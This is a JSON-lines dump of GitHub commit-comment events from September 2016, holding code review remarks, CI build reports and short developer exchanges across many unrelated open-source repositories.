{"id":"4535747622","type":"CommitCommentEvent","actor":{"login":"ufdada"},"repo":{"name":"tonihele/OpenKeeper"},"payload":{"comment":{"id":18950291,"position":null,"line":null,"path":null,"commit_id":"41a6682a5846ee1e050cb0bab56d259925f6b0cb","created_at":"2016-09-08T18:18:06Z","updated_at":"2016-09-08T18:18:06Z","body":"#236 done?"}},"created_at":"2016-09-08T18:18:06Z"}
{"id":"4535748622","type":"CommitCommentEvent","actor":{"login":"jakejohns"},"repo":{"name":"atlasphp/Atlas.Cli"},"payload":{"comment":{"id":18950292,"position":null,"line":null,"path":null,"commit_id":"acbdacb23af01778f4163d9c9f062394e5ce00ff","created_at":"2016-09-08T18:18:16Z","updated_at":"2016-09-08T18:18:16Z","body":"is it better to look in default dir first, read the template, then look in custom and overwrite, as it is now?\r\nor should it look in custom first and simply continue/not look in default if was already found? \r\nIt probably doesn't matter THAT much. "}},"created_at":"2016-09-08T18:18:16Z"}
{"id":"4535750094","type":"CommitCommentEvent","actor":{"login":"sorbits"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18950295,"position":212,"line":130,"path":"Frameworks/OakAppKit/src/OakPopOutAnimation.mm","commit_id":"dd3ebefe3f60b323af5a6b1e104c04b43da78eeb","created_at":"2016-09-08T18:18:30Z","updated_at":"2016-09-08T18:18:30Z","body":"> After closing the window, you could do [shapeLayer removeAllAnimations], perhaps\r\n\r\nThat works, thanks: 5f602844fb0b951c49bedd87851683f4cb07a527\r\n"}},"created_at":"2016-09-08T18:18:30Z"}
{"id":"4535752710","type":"CommitCommentEvent","actor":{"login":"lobolmart"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18950304,"position":642,"line":364,"path":"MBINCompiler/Models/Structs/Unfinished/GcCreatureGlobals.cs","commit_id":"b18f7c8913ef6e5d42faebb291ed88b20cba463c","created_at":"2016-09-08T18:19:00Z","updated_at":"2016-09-08T18:19:00Z","body":"if the strncpy is on multiple lines it will be skipped."}},"created_at":"2016-09-08T18:19:00Z"}
{"id":"4535755544","type":"CommitCommentEvent","actor":{"login":"scrooloose"},"repo":{"name":"hokorobi/plantuml-syntax"},"payload":{"comment":{"id":18950308,"position":null,"line":null,"path":null,"commit_id":"fc7a8ca8bb93edd01138ad8c7ce3974201b3ae9e","created_at":"2016-09-08T18:19:31Z","updated_at":"2016-09-08T18:19:31Z","body":"Whoops! I can't believe I failed at indenting :blush:"}},"created_at":"2016-09-08T18:19:31Z"}
{"id":"4535757082","type":"CommitCommentEvent","actor":{"login":"yash2710"},"repo":{"name":"IEEENU/ieeenu.github.io"},"payload":{"comment":{"id":18950317,"position":null,"line":null,"path":null,"commit_id":"d1a660c206d958bde8578d06de97f48f10a94cfa","created_at":"2016-09-08T18:19:49Z","updated_at":"2016-09-08T18:19:49Z","body":"Maps mai issue tha... Pehle key not defined and then marker and fir\nlocation galat and provision improvement\n\nOn Sep 8, 2016 11:48 PM, \"girish ramnani\" <notifications@github.com> wrote:\n\n> issue kya hai?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/IEEENU/ieeenu.github.io/commit/d1a660c206d958bde8578d06de97f48f10a94cfa#commitcomment-18950290>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIEP-ZfPqMdNeoLQ8-xQv-pz14nUfBYdks5qoFFdgaJpZM4J4Sry>\n> .\n>\n"}},"created_at":"2016-09-08T18:19:49Z"}
{"id":"4535758701","type":"CommitCommentEvent","actor":{"login":"zotherstupidguy"},"repo":{"name":"Sonopace/sonopace.github.io"},"payload":{"comment":{"id":18950318,"position":18,"line":18,"path":"sonoplayer/src/reducers/playlist.js","commit_id":"bcd205a3eff43b0451fd17aaa08ff0b24700f423","created_at":"2016-09-08T18:20:07Z","updated_at":"2016-09-08T18:20:07Z","body":"what?"}},"created_at":"2016-09-08T18:20:07Z"}
{"id":"4535759862","type":"CommitCommentEvent","actor":{"login":"zotherstupidguy"},"repo":{"name":"Sonopace/sonopace.github.io"},"payload":{"comment":{"id":18950322,"position":18,"line":18,"path":"sonoplayer/src/reducers/playlist.js","commit_id":"bcd205a3eff43b0451fd17aaa08ff0b24700f423","created_at":"2016-09-08T18:20:20Z","updated_at":"2016-09-08T18:20:20Z","body":"okay\r\n"}},"created_at":"2016-09-08T18:20:20Z"}
{"id":"4535761646","type":"CommitCommentEvent","actor":{"login":"girishramnani"},"repo":{"name":"IEEENU/ieeenu.github.io"},"payload":{"comment":{"id":18950328,"position":null,"line":null,"path":null,"commit_id":"d1a660c206d958bde8578d06de97f48f10a94cfa","created_at":"2016-09-08T18:20:36Z","updated_at":"2016-09-08T18:20:36Z","body":"Ab ho gaya finally?\n\nOn 08-Sep-2016 11:49 pm, \"Yash Trivedi\" <notifications@github.com> wrote:\n\n> Maps mai issue tha... Pehle key not defined and then marker and fir\n> location galat and provision improvement\n>\n> On Sep 8, 2016 11:48 PM, \"girish ramnani\" <notifications@github.com>\n> wrote:\n>\n> > issue kya hai?\n> >\n> > —\n> > You are receiving this because you are subscribed to this thread.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/IEEENU/ieeenu.github.io/commit/\n> d1a660c206d958bde8578d06de97f48f10a94cfa#commitcomment-18950290>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-\n> auth/AIEP-ZfPqMdNeoLQ8-xQv-pz14nUfBYdks5qoFFdgaJpZM4J4Sry>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/IEEENU/ieeenu.github.io/commit/d1a660c206d958bde8578d06de97f48f10a94cfa#commitcomment-18950317>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGP5tOCJ-ziBPN-c1VpGtjSDqrRHhNPBks5qoFHGgaJpZM4J4Sry>\n> .\n>\n"}},"created_at":"2016-09-08T18:20:36Z"}
{"id":"4535762760","type":"CommitCommentEvent","actor":{"login":"BurtHarris"},"repo":{"name":"types/env-electron"},"payload":{"comment":{"id":18950330,"position":null,"line":null,"path":null,"commit_id":"b52235aa7f4551c620c1231f9499b02d5a110712","created_at":"2016-09-08T18:20:49Z","updated_at":"2016-09-08T18:20:49Z","body":"Bug in DefinitelyTyped/DefinitelyTyped#10977 "}},"created_at":"2016-09-08T18:20:49Z"}
{"id":"4535762894","type":"CommitCommentEvent","actor":{"login":"lobolmart"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18950331,"position":35,"line":239,"path":"MBINCompiler/Models/Structs/Unfinished/GcSpaceshipGlobals.cs","commit_id":"d8b66bdd1a3f4e729718a594110e6dbf113c3d40","created_at":"2016-09-08T18:20:50Z","updated_at":"2016-09-08T18:20:50Z","body":"yup, these need manual adjustment - e.g.:\r\n```\r\n*(_DWORD *)(v1 + 0x418) = <the value of v2 perhaps and not v2>;\r\n"}},"created_at":"2016-09-08T18:20:50Z"}
{"id":"4535768010","type":"CommitCommentEvent","actor":{"login":"federico0980"},"repo":{"name":"federico0980/leon"},"payload":{"comment":{"id":18950336,"position":null,"line":null,"path":null,"commit_id":"8f7ae6f49ae5004bc389a5da09228ca337f170da","created_at":"2016-09-08T18:21:45Z","updated_at":"2016-09-08T18:21:45Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;SifMhbch&#x2F;8-en-el-modulo-de-ventas-que-un-recibo-pueda-tener-un-pago-parcial\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> En el módulo de ventas, que un recibo pueda tener un pago parcial</a>"}},"created_at":"2016-09-08T18:21:45Z"}
{"id":"4535771250","type":"CommitCommentEvent","actor":{"login":"jtbandes"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":18950341,"position":4,"line":142,"path":"Frameworks/OakAppKit/src/OakPopOutAnimation.mm","commit_id":"5f602844fb0b951c49bedd87851683f4cb07a527","created_at":"2016-09-08T18:22:17Z","updated_at":"2016-09-08T18:22:17Z","body":"I would recommend doing this after `orderOut`. The point of `removedOnCompletion=NO` was to avoid flashing the un-animated state before the window closes."}},"created_at":"2016-09-08T18:22:17Z"}
{"id":"4535772990","type":"CommitCommentEvent","actor":{"login":"yash2710"},"repo":{"name":"IEEENU/ieeenu.github.io"},"payload":{"comment":{"id":18950346,"position":null,"line":null,"path":null,"commit_id":"d1a660c206d958bde8578d06de97f48f10a94cfa","created_at":"2016-09-08T18:22:35Z","updated_at":"2016-09-08T18:22:35Z","body":"Ha\n\nOn Sep 8, 2016 11:50 PM, \"girish ramnani\" <notifications@github.com> wrote:\n\n> Ab ho gaya finally?\n>\n> On 08-Sep-2016 11:49 pm, \"Yash Trivedi\" <notifications@github.com> wrote:\n>\n> > Maps mai issue tha... Pehle key not defined and then marker and fir\n> > location galat and provision improvement\n> >\n> > On Sep 8, 2016 11:48 PM, \"girish ramnani\" <notifications@github.com>\n> > wrote:\n> >\n> > > issue kya hai?\n> > >\n> > > —\n> > > You are receiving this because you are subscribed to this thread.\n> > > Reply to this email directly, view it on GitHub\n> > > <https://github.com/IEEENU/ieeenu.github.io/commit/\n> > d1a660c206d958bde8578d06de97f48f10a94cfa#commitcomment-18950290>,\n> > > or mute the thread\n> > > <https://github.com/notifications/unsubscribe-\n> > auth/AIEP-ZfPqMdNeoLQ8-xQv-pz14nUfBYdks5qoFFdgaJpZM4J4Sry>\n> > > .\n> > >\n> >\n> > —\n> > You are receiving this because you commented.\n> > Reply to this email directly, view it on GitHub\n> > <https://github.com/IEEENU/ieeenu.github.io/commit/\n> d1a660c206d958bde8578d06de97f48f10a94cfa#commitcomment-18950317>,\n> > or mute the thread\n> > <https://github.com/notifications/unsubscribe-auth/AGP5tOCJ-ziBPN-\n> c1VpGtjSDqrRHhNPBks5qoFHGgaJpZM4J4Sry>\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/IEEENU/ieeenu.github.io/commit/d1a660c206d958bde8578d06de97f48f10a94cfa#commitcomment-18950328>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIEP-X7uqWmxI4t1_pce5ihnZFMHuJ1Nks5qoFH1gaJpZM4J4Sry>\n> .\n>\n"}},"created_at":"2016-09-08T18:22:35Z"}
{"id":"4535780106","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18950364,"position":null,"line":null,"path":null,"commit_id":"bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8","created_at":"2016-09-08T18:23:53Z","updated_at":"2016-09-08T18:23:53Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.765.bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8](http://build.palaso.org/viewLog.html?buildId=76672&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:04:17"}},"created_at":"2016-09-08T18:23:53Z"}
{"id":"4535784089","type":"CommitCommentEvent","actor":{"login":"cowtowncoder"},"repo":{"name":"FasterXML/jackson-databind"},"payload":{"comment":{"id":18950373,"position":9,"line":716,"path":"src/main/java/com/fasterxml/jackson/databind/deser/BeanDeserializerFactory.java","commit_id":"b2ccdee0fdc52cd46577a90cb50dc011d6d681bf","created_at":"2016-09-08T18:24:38Z","updated_at":"2016-09-08T18:24:38Z","body":"Yes; I added one more check in the following check-in. Thank you for pointing this out!"}},"created_at":"2016-09-08T18:24:38Z"}
{"id":"4535784853","type":"CommitCommentEvent","actor":{"login":"colbycheeze"},"repo":{"name":"IBM-Bluemix/logistics-wizard-webui"},"payload":{"comment":{"id":18950375,"position":1,"line":1,"path":"src/routes/Dashboard/components/Dashboard.jsx","commit_id":"522ad0440911c95b738b6b566f8c0ba3ad1fc9e2","created_at":"2016-09-08T18:24:45Z","updated_at":"2016-09-08T18:24:45Z","body":"Yes most of the data wrangling happening here should likely be happening in the reducer, such that when we pass the store data into the component, it's mostly in the shape needed to give popup card the required props."}},"created_at":"2016-09-08T18:24:45Z"}
{"id":"4535786221","type":"CommitCommentEvent","actor":{"login":"hawkins"},"repo":{"name":"MSUStudents/BetterBanner"},"payload":{"comment":{"id":18950377,"position":null,"line":null,"path":null,"commit_id":"26483bf520025b48f01d9b6414627d2b70c10d4b","created_at":"2016-09-08T18:24:58Z","updated_at":"2016-09-08T18:24:58Z","body":"@JacobAMason for what it's worth, the file you download from the Play Store is a glorified .zip archive, you can open it with an archive explorer like 7-Zip to see the code currently deployed. \r\n\r\nAlso, a more obvious and streamlined release process is in the works that should clarify what code is currently deployed, but it's not quite ready to go public yet. Soon!"}},"created_at":"2016-09-08T18:24:58Z"}
{"id":"4535790150","type":"CommitCommentEvent","actor":{"login":"KleinerNull"},"repo":{"name":"KleinerNull/xmldataset"},"payload":{"comment":{"id":18950380,"position":null,"line":null,"path":null,"commit_id":"25b42619e624103edbe7c6f790d16197d45e88c0","created_at":"2016-09-08T18:25:37Z","updated_at":"2016-09-08T18:25:37Z","body":"The `__init__.py` is for exposing the right modules, objects and functions to the outside world. So I splitted `parse_using_profile' and `_XMLDataset` into two different modules.\r\n\r\n`parse_using_profile' lives now in the `parsing.py` module, in hope that there will be more different parsing functions in the future, so all have a place there.\r\n\r\n`_XMLDataset` is for now in `_XMLDataset.py`. Maybe a better name would suit it better. I am not sure yet. This could also a place for different Objects to parse different markup languages in the future..."}},"created_at":"2016-09-08T18:25:37Z"}
{"id":"4535791523","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18950385,"position":null,"line":null,"path":null,"commit_id":"bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8","created_at":"2016-09-08T18:25:51Z","updated_at":"2016-09-08T18:25:51Z","body":"TeamCity libpalaso :: palaso-trusty64-lfmerge Continuous [Build 2.6.70.bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8](http://build.palaso.org/viewLog.html?buildId=76675&buildTypeId=PalasoPrecise64lfmergeContinuous) outcome was **FAILURE**\nSummary: Tests failed: 4 (4 new), passed: 3466, ignored: 107 Build time: 00:05:10\n### Failed tests\n```\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.ReleaseLock_LockedByActiveProcess_LockFileExists: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcess_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessNotTimedOut_ReturnsFalse: <no details avaliable>\n\nSIL.Core.Tests.dll: SIL.Tests.IO.FileLock.SimpleFileLockTests.TryAcquireLock_LockedByActiveProcessTimedOut_ReturnsTrue: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-08T18:25:51Z"}
{"id":"4535791554","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18950386,"position":null,"line":null,"path":null,"commit_id":"bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8","created_at":"2016-09-08T18:25:51Z","updated_at":"2016-09-08T18:25:51Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.763.bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8](http://build.palaso.org/viewLog.html?buildId=76673&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:12"}},"created_at":"2016-09-08T18:25:51Z"}
{"id":"4535793233","type":"CommitCommentEvent","actor":{"login":"Stolas"},"repo":{"name":"snare/voltron"},"payload":{"comment":{"id":18950390,"position":null,"line":null,"path":null,"commit_id":"ef27410896b872397d3cf7525b495ca477f710b0","created_at":"2016-09-08T18:26:09Z","updated_at":"2016-09-08T18:26:09Z","body":"Gz on the new job mate :)"}},"created_at":"2016-09-08T18:26:09Z"}
{"id":"4535793435","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18950392,"position":4,"line":4,"path":"bootstrap.sh","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T18:26:10Z","updated_at":"2016-09-08T18:26:10Z","body":"Currently `ubuntu1404-desktop` is specified in the `Vagrantfile`, which means `default-jdk` and `maven` packages resolve to\r\n\r\n- `java (1.7-51)` -- http://packages.ubuntu.com/trusty/default-jdk\r\n- `maven (3.0.5-1)` -- http://packages.ubuntu.com/trusty/maven\r\n\r\nFAST (and maybe others too) require maven 3.3+ and java 1.8+... I recommend switching to \r\n\r\n```\r\nconfig.vm.box = \"box-cutter/ubuntu1604-desktop\"\r\n```\r\n\r\nin the `Vagrantfile`."}},"created_at":"2016-09-08T18:26:10Z"}
{"id":"4535794474","type":"CommitCommentEvent","actor":{"login":"klutzer"},"repo":{"name":"saoj/mentacontainer"},"payload":{"comment":{"id":18950393,"position":17,"line":17,"path":"src/test/java/org/mentacontainer/impl/AutoWiringClassTest.java","commit_id":"dec554b378b6437a89aafa9e4fa1d0292823b086","created_at":"2016-09-08T18:26:20Z","updated_at":"2016-09-08T18:26:20Z","body":"But here I need to configure de init value \"fake session\" for all FakeSession instances, then when I call `container.get(FakeSession.class)` it gives me an instance with the `sessionName` populated"}},"created_at":"2016-09-08T18:26:20Z"}
{"id":"4535796250","type":"CommitCommentEvent","actor":{"login":"kaganjd"},"repo":{"name":"processing/p5.js-web-editor"},"payload":{"comment":{"id":18950394,"position":null,"line":null,"path":null,"commit_id":"00c979a763ee216e144cf8253e19a676793fa612","created_at":"2016-09-08T18:26:37Z","updated_at":"2016-09-08T18:26:37Z","body":"@catarak I think this is *a* way to do keyboard shortcuts, although I'm having trouble figuring out what function to call (`startSketch()` doesn't work). Can you point me in the right direction? \r\n\r\nNote to my future self if we decide to do more shortcuts:\r\nCodeMirror keymap docs: https://codemirror.net/doc/manual.html#keymaps\r\nJS event keycodes: http://keycode.info/"}},"created_at":"2016-09-08T18:26:37Z"}
{"id":"4535797360","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18950395,"position":14,"line":14,"path":"bootstrap.sh","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T18:26:47Z","updated_at":"2016-09-08T18:26:47Z","body":"Passing `SSH_AUTH_SOCK=$SSH_AUTH_SOCK` was only for SSH agent forwarding. Since we're not cloning over SSH anymore, this is not necessary."}},"created_at":"2016-09-08T18:26:47Z"}
{"id":"4535797463","type":"CommitCommentEvent","actor":{"login":"NavidZ"},"repo":{"name":"w3c/web-platform-tests"},"payload":{"comment":{"id":18950396,"position":null,"line":null,"path":null,"commit_id":"075b04ca74433f7a331a3fd7449974909fbed108","created_at":"2016-09-08T18:26:48Z","updated_at":"2016-09-08T18:26:48Z","body":"lgtm"}},"created_at":"2016-09-08T18:26:48Z"}
{"id":"4535799190","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18950397,"position":null,"line":null,"path":null,"commit_id":"4231a08e57f86cedfe806f11cc87683e46c456bb","created_at":"2016-09-08T18:27:06Z","updated_at":"2016-09-08T18:27:06Z","body":"Same idea is already being tested:\r\nhttp://tests.stockfishchess.org/tests/view/57d110440ebc59030fbe5078"}},"created_at":"2016-09-08T18:27:06Z"}
{"id":"4535802722","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18950403,"position":9,"line":9,"path":"Vagrantfile","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T18:27:39Z","updated_at":"2016-09-08T18:27:39Z","body":"don't need to forward SSH agent, since we're not cloning over SSH anymore."}},"created_at":"2016-09-08T18:27:39Z"}
{"id":"4535803465","type":"CommitCommentEvent","actor":{"login":"cmungall"},"repo":{"name":"biodatasets/mybiocaddie"},"payload":{"comment":{"id":18950407,"position":null,"line":null,"path":null,"commit_id":"72fc6434ee903635b713271334ddbffffb18daac","created_at":"2016-09-08T18:27:45Z","updated_at":"2016-09-08T18:27:45Z","body":"Tagged wrong repo - fixes this one https://github.com/cmungall/biocaddie-gym/issues/7"}},"created_at":"2016-09-08T18:27:45Z"}
{"id":"4535805251","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18950409,"position":null,"line":null,"path":null,"commit_id":"7a5765496a58a3dfa595aea4d30a0eb01ce4a65e","created_at":"2016-09-08T18:28:04Z","updated_at":"2016-09-08T18:28:04Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#I_9E5WwgTICRWBjeOPjwEw"}},"created_at":"2016-09-08T18:28:04Z"}
{"id":"4535807976","type":"CommitCommentEvent","actor":{"login":"cmacrander"},"repo":{"name":"PERTS/gymnast"},"payload":{"comment":{"id":18950414,"position":null,"line":null,"path":null,"commit_id":"2a8d65f535bce3473792609cd025c90b5138f951","created_at":"2016-09-08T18:28:29Z","updated_at":"2016-09-08T18:28:29Z","body":"@sarahgripshover post-hoc code review please\r\n\r\ndiscovered these obvious bugs when looking over the misc code archive"}},"created_at":"2016-09-08T18:28:29Z"}
{"id":"4535809027","type":"CommitCommentEvent","actor":{"login":"fdrtec"},"repo":{"name":"fdrtec/trilha"},"payload":{"comment":{"id":18950417,"position":null,"line":null,"path":null,"commit_id":"16d1a2fa4e5f32e6101ebce34e042f78f3efe3e3","created_at":"2016-09-08T18:28:42Z","updated_at":"2016-09-08T18:28:42Z","body":"Este Branch se refere ao projeto com os controles iniciais que deram origem a logica, se o array no trackFilling for comentado, e o array vazio descomentado a trilha começa a ser gerada do zero."}},"created_at":"2016-09-08T18:28:42Z"}
{"id":"4535809433","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18950418,"position":10,"line":10,"path":"Vagrantfile","commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T18:28:46Z","updated_at":"2016-09-08T18:28:46Z","body":"would anyone actually use X11 forwarding?"}},"created_at":"2016-09-08T18:28:46Z"}
{"id":"4535811746","type":"CommitCommentEvent","actor":{"login":"lobolmart"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18950423,"position":374,"line":374,"path":"MBINCompiler/Models/Structs/Unfinished/GcAISpaceshipGlobals.cs","commit_id":"132da8c71fceda4304b846f4279e249ac54fff9c","created_at":"2016-09-08T18:29:15Z","updated_at":"2016-09-08T18:29:15Z","body":"placing on top of the input the following:\r\n```\r\n#define_sub sub_<some_exe_offset> GcShipAIAttackData <size_of_template>\r\n```\r\nshould auto replace the sub calls and also check for padding between them.\r\n"}},"created_at":"2016-09-08T18:29:15Z"}
{"id":"4535814734","type":"CommitCommentEvent","actor":{"login":"charlierproctor"},"repo":{"name":"snlab/IntegrationVM"},"payload":{"comment":{"id":18950430,"position":null,"line":null,"path":null,"commit_id":"f0e2e65444c4fd10cdc4c1554165d6869561b4da","created_at":"2016-09-08T18:29:49Z","updated_at":"2016-09-08T18:29:49Z","body":"Overall, looks good to me. I'll give it a try 👍 "}},"created_at":"2016-09-08T18:29:49Z"}
{"id":"4535817222","type":"CommitCommentEvent","actor":{"login":"lobolmart"},"repo":{"name":"emoose/MBINCompiler"},"payload":{"comment":{"id":18950441,"position":384,"line":384,"path":"MBINCompiler/Models/Structs/Unfinished/GcAISpaceshipGlobals.cs","commit_id":"132da8c71fceda4304b846f4279e249ac54fff9c","created_at":"2016-09-08T18:30:20Z","updated_at":"2016-09-08T18:30:20Z","body":"i'm about to add support for auto-padding at the end if the resulted size is smaller than the target size.\r\n"}},"created_at":"2016-09-08T18:30:20Z"}
{"id":"4535822004","type":"CommitCommentEvent","actor":{"login":"terry2212"},"repo":{"name":"terry2212/3DNES"},"payload":{"comment":{"id":18950456,"position":null,"line":null,"path":null,"commit_id":"851477e8b43173e785d80e984908863c50177580","created_at":"2016-09-08T18:31:06Z","updated_at":"2016-09-08T18:31:06Z","body":"1002171836393387"}},"created_at":"2016-09-08T18:31:06Z"}
{"id":"4535822797","type":"CommitCommentEvent","actor":{"login":"hainingl"},"repo":{"name":"hainingl/gbf"},"payload":{"comment":{"id":18950459,"position":1,"line":42,"path":"src/main/scala/BinExpandApp.scala","commit_id":"230b9db59dbf9eaacc7bb90786cf899d8d92bcbf","created_at":"2016-09-08T18:31:14Z","updated_at":"2016-09-08T18:31:14Z","body":"fixed,\r\ntry to find time to add test cases later"}},"created_at":"2016-09-08T18:31:14Z"}
{"id":"4535826276","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18950465,"position":null,"line":null,"path":null,"commit_id":"bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8","created_at":"2016-09-08T18:31:45Z","updated_at":"2016-09-08T18:31:45Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1097.bc3b0a1f77f509307ae86225eeb3bd4c77f4c5a8](http://build.palaso.org/viewLog.html?buildId=76674&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:05:49"}},"created_at":"2016-09-08T18:31:45Z"}
{"id":"4535832650","type":"CommitCommentEvent","actor":{"login":"tonihele"},"repo":{"name":"tonihele/OpenKeeper"},"payload":{"comment":{"id":18950478,"position":null,"line":null,"path":null,"commit_id":"41a6682a5846ee1e050cb0bab56d259925f6b0cb","created_at":"2016-09-08T18:32:56Z","updated_at":"2016-09-08T18:32:56Z","body":"No, not really, I mean these:\r\nhttps://github.com/tonihele/OpenKeeper/blob/master/src/toniarts/openkeeper/tools/convert/map/KwdFile.java#L2220\r\n\r\nAnd if it has none, then skip the data. But not log it as an error. But surely it has some."}},"created_at":"2016-09-08T18:32:56Z"}
{"id":"4535844285","type":"CommitCommentEvent","actor":{"login":"SmirnovEgorRu"},"repo":{"name":"wakzonator/traffic_lighter"},"payload":{"comment":{"id":18950502,"position":11,"line":15,"path":"дорога/crossroad.h","commit_id":"d5f0fac547e18134dda2ad50277cb256fa2d43d6","created_at":"2016-09-08T18:35:01Z","updated_at":"2016-09-08T18:35:01Z","body":"Так как-то покомпактнее :)\r\nfor (int i = 0; i < 4; ++i)\r\n    if (lights[i] != nullptr)\r\n        lights[i]->Image = list->Images[color];\r\nлучше писать префиксную форму (++i) там, где это возможно\r\nП.С. развонял совсем"}},"created_at":"2016-09-08T18:35:01Z"}
{"id":"4535846408","type":"CommitCommentEvent","actor":{"login":"graysonwright"},"repo":{"name":"thoughtbot/administrate"},"payload":{"comment":{"id":18950507,"position":null,"line":null,"path":null,"commit_id":"5227c9bc5b20904155f419409d6c3606763d24a5","created_at":"2016-09-08T18:35:23Z","updated_at":"2016-09-08T18:35:23Z","body":"@buren We need to periodically re-seed the database for <http://administrate-prototype.herokuapp.com> so the sample data is kept fresh for visitors.\r\n\r\nThat application runs in the production environment, so we need `faker` available in production as well in order to run the seeds.\r\n\r\nIt doesn't seem like the size of the library will have too many adverse effects, because it is only installed for people hosting the demo site. It's not a dependency for Administrate itself."}},"created_at":"2016-09-08T18:35:23Z"}
{"id":"4535847053","type":"CommitCommentEvent","actor":{"login":"Goles"},"repo":{"name":"Goles/mopub-ios-sdk"},"payload":{"comment":{"id":18950509,"position":null,"line":null,"path":null,"commit_id":"75cb8ba9a0881094696e069e8d05864d42aa64de","created_at":"2016-09-08T18:35:32Z","updated_at":"2016-09-08T18:35:32Z","body":"I talked with Linda about this, and I think you're actually right. The callback won't change a thing, because we already told them 'we're passing on this ad opportunity', so even if we call back a second later with `adPlayable == YES`, it doesn't matter anymore.\r\n\r\nAlso, even if the callback randomly get's called with a YES (without `requestAdWithCustomEventInfo:delegate:` having been called), they will check the `isAdPlayable` state when trying to play an ad anyway and the callback won't really matter.\r\n\r\nIs this what you're basically pointing out? "}},"created_at":"2016-09-08T18:35:32Z"}
{"id":"4535849417","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/omap3-usb-boot-install"},"payload":{"comment":{"id":18950520,"position":null,"line":null,"path":null,"commit_id":"a02993e2bc4485d752040b27f2ed486e76c736b8","created_at":"2016-09-08T18:35:59Z","updated_at":"2016-09-08T18:35:59Z","body":"Pls run changes by the maintainer :-) The right fix for this is actually to delete the line, which was a workaround for a man-db misfeature which has been removed."}},"created_at":"2016-09-08T18:35:59Z"}
{"id":"4535849797","type":"CommitCommentEvent","actor":{"login":"r05al"},"repo":{"name":"drodriguez56/spree_reffiliate"},"payload":{"comment":{"id":18950522,"position":null,"line":null,"path":null,"commit_id":"fa45c91288b1891688a9d5f10d98575afc7a124e","created_at":"2016-09-08T18:36:04Z","updated_at":"2016-09-08T18:36:04Z","body":"make 3-0-stable"}},"created_at":"2016-09-08T18:36:04Z"}
